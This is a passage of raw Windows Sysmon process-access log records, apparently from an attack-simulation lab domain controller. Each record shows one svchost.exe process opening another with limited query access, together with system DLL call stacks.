13:29:58.701{08A6967A-4754-6000-1A05-000000009A01}28843340C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1905-000000009A01}2124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114786|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010350Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.685{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010349Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.685{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010348Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.685{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010347Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.685{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010346Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.685{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010345Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.685{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010344Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.685{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010343Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.685{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010342Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.685{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010341Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.685{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010340Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.685{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010339Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.685{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010338Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.685{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010337Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.685{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010336Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.685{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010335Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.685{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010334Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.685{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010333Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.685{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010332Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.685{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010331Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.670{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010330Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.670{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010329Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.670{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010328Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:58.670{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010327Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 